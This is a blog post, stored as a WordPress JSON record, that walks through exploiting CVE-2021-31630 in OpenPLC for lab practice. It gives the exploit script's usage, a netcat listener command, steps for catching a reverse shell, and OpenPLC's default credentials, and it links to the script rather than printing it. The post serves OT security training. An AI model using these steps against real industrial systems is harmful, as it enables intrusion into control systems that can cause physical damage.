{"id":1660,"date":"2025-03-01T10:57:53","date_gmt":"2025-03-01T07:57:53","guid":{"rendered":"https:\/\/zerontek.com\/zt\/?p=1660"},"modified":"2025-03-01T10:58:42","modified_gmt":"2025-03-01T07:58:42","slug":"ot-lab-hacking-openplc","status":"publish","type":"post","link":"https:\/\/zerontek.com\/zt\/2025\/03\/01\/ot-lab-hacking-openplc\/","title":{"rendered":"OT Lab: Hacking OpenPLC"},"content":{"rendered":"\n<p>Having an OT lab is crucial for any OT security practitioner or learner. It\u2019s where you gain practical, hands-on skills that can\u2019t be acquired just by reading documentation or watching videos. Fortunately, setting up an OT lab today is easier than ever, whether you invest in real devices like a PLC or opt for a simulated one with similar functionalities, such as OpenPLC (<a href=\"https:\/\/autonomylogic.com\/\">https:\/\/autonomylogic.com<\/a>).<\/p>\n\n\n\n<p>Today, I\u2019m not going to walk you through setting up a lab\u2014you can refer to projects like <a href=\"https:\/\/github.com\/zakharb\/labshock\">LabShock<\/a> by <a href=\"https:\/\/www.linkedin.com\/in\/zakharb\/?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BmHneQgWoTNGgKU1aNAqktA%3D%3D\" target=\"_blank\" rel=\"noreferrer noopener\">Zakhar Bernhardt<\/a> for that. Instead, I\u2019m complementing his lab by adding an offensive tool that you can use inside the Kali (hacker) machine to communicate with OpenPLC.<\/p>\n\n\n\n<p>So, how do you hack a PLC\u2014in this case, OpenPLC?<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Exploiting OpenPLC WebServer 3: CVE-2021-31630<\/h3>\n\n\n\n<p>While exploring OpenPLC, I came across an existing vulnerability, <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-31630\">CVE-2021-31630<\/a>, which allows remote code execution. A bit of research led me to multiple public exploits, which I modified to fit my lab setup. With these adjustments, I was able to get a reverse shell and gain access to the OpenPLC web server.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"347\" src=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1024x347.png\" alt=\"\" class=\"wp-image-1661\" srcset=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1024x347.png 1024w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-300x102.png 300w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-768x260.png 768w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image.png 1506w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Proof of Concept (PoC) Exploit<\/h3>\n\n\n\n<p>The following <a href=\"https:\/\/github.com\/selmux\/Alhasawi-ICS-OT-Security-projetcs\/tree\/main\/OT%20Lab\/OpenPLc\/OpenPlc-CVE-2021-31630\">script<\/a> demonstrates how to exploit CVE-2021-31630. By executing this, an attacker can inject a payload into the OpenPLC system, leading to a reverse shell.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Usage:<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 OpenPlc-CVE-2021-31630.py -ip &lt;LISTEN_IP&gt; -p &lt;LISTEN_PORT&gt; -u &lt;USERNAME&gt; -pwd &lt;PASSWORD&gt;\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Example:<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 OpenPlc-CVE-2021-31630.py -ip 192.168.1.100 -p 1111 -u openplc -pwd openplc\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Arguments:<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>-ip &lt;LISTEN_IP><\/code> : The IP address to listen on for the reverse shell (Kali machine).<\/li>\n\n\n\n<li><code>-p &lt;LISTEN_PORT><\/code> : The port number to listen on.<\/li>\n\n\n\n<li><code>-u &lt;USERNAME><\/code> : OpenPLC login username.<\/li>\n\n\n\n<li><code>-pwd &lt;PASSWORD><\/code> : OpenPLC login password.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Exploitation Methodology<\/h3>\n\n\n\n<p>To execute the attack, follow these steps:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Set up a Netcat listener<\/strong> on your attacking machine: <code>nc -lnvp 1111<\/code><\/li>\n\n\n\n<li><strong>Change the base URL<\/strong> in the script to match the OpenPLC address.<\/li>\n\n\n\n<li><strong>Run the exploit<\/strong> : <code>python3 OpenPlc-CVE-2021-31630.py -ip 192.168.1.100 -p 1111 -u openplc -pwd openplc<\/code><\/li>\n\n\n\n<li><strong>Catch the reverse shell<\/strong>\u2014if successful, you will have access to the OpenPLC machine.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Default OpenPLC Credentials<\/h3>\n\n\n\n<p>By default, OpenPLC has with the following credentials:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Username: openplc\nPassword: openplc\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"669\" height=\"130\" src=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1.png\" alt=\"\" class=\"wp-image-1662\" srcset=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1.png 669w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1-300x58.png 300w\" sizes=\"auto, (max-width: 669px) 100vw, 669px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"711\" height=\"258\" src=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-3.png\" alt=\"\" class=\"wp-image-1664\" srcset=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-3.png 711w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-3-300x109.png 300w\" sizes=\"auto, (max-width: 711px) 100vw, 711px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1012\" height=\"250\" src=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-2.png\" alt=\"\" class=\"wp-image-1663\" srcset=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-2.png 1012w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-2-300x74.png 300w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-2-768x190.png 768w\" sizes=\"auto, (max-width: 1012px) 100vw, 1012px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Final Thoughts<\/h3>\n\n\n\n<p>I hope you enjoyed this article. This could be helpful in practicing pen testing on a simulated environment and learning more about attacker skills.<\/p>\n\n\n\n<p>Feel free to get the exploit from my GitHub where I host OT security tools and guides: <a href=\"https:\/\/github.com\/selmux\/Alhasawi-ICS-OT-Security-projetcs\/tree\/main\/OT%20Lab\/OpenPLc\/OpenPlc-CVE-2021-31630\">Alhasawi GitHUb<\/a>.<\/p>\n\n\n\n<p>Happy hacking and keep sharpening your OT security skills!<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Having an OT lab is crucial for any OT security practitioner or learner. It\u2019s where you gain practical, hands-on skills that can\u2019t be acquired just by reading documentation or watching videos. Fortunately, setting up an OT lab today is easier than ever, whether you invest in real devices like a PLC or opt for a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1669,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,214,279,283,48,106,67],"tags":[285,7,287,286,6,284,47],"class_list":["post-1660","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-security","category-exploits","category-open-source","category-openplc","category-ot-security","category-penetration-testing","category-plc","tag-cve-2021-31630","tag-cyber-security","tag-hack-openplc","tag-hack-plc","tag-ics-security","tag-openplc","tag-ot-security"],"_links":{"self":[{"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/posts\/1660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/comments?post=1660"}],"version-history":[{"count":4,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/posts\/1660\/revisions"}],"predecessor-version":[{"id":1670,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/posts\/1660\/revisions\/1670"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/media\/1669"}],"wp:attachment":[{"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/media?parent=1660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/categories?post=1660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/tags?post=1660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}